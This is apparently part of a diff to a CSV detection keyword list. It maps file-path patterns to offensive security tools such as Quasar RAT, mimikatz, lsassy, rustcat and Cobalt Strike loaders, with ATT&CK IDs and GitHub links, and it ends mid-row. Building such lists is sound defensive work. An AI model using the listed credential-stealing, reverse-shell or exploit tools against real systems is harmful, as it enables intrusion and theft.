-"*/Quasar.git*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*/Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*/Quasar/releases*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar.git*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar/releases*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" "*/quicserver.exe*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*/r00t-3xp10it*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/raceabrt.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/rahul1406/cve-2022-0847dirtypipe-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RAI.git*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*/rakjong/mimikatz_bypassAV/*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/rakjong/mimikatz_bypassAV/*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*/ramnit.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/random-robbie/cve-2022-23131-exp*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" -"*/Ransomware.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/Ransomware.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*/rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*/RasmanPotato*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" @@ -4921,16 +4968,19 @@ "*/ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.syso*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ratchatPT.syso*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" -"*/RationalLove.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/RationalLove.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/raw/kali/main/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/raw/kali/master/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/raw_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*/rawrpc.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*/raw_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/rawrpc.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*/RC4BinaryEncryption.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/RC4Payload32.txt*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" -"*/RCStep/CSSG/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*/RDE1.git*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*/rdll_template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/rcat-v*-win-x86_64.exe*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/RCStep/CSSG/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/rdcman.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/RDE1.git*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*/rdll_template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rdp.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/RDPassSpray.git*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*/RDPCredentialStealer.git*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*/rdp-enum-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4939,17 +4989,17 @@ "*/readfile_bof.*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" "*/Readfile_BoF/*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 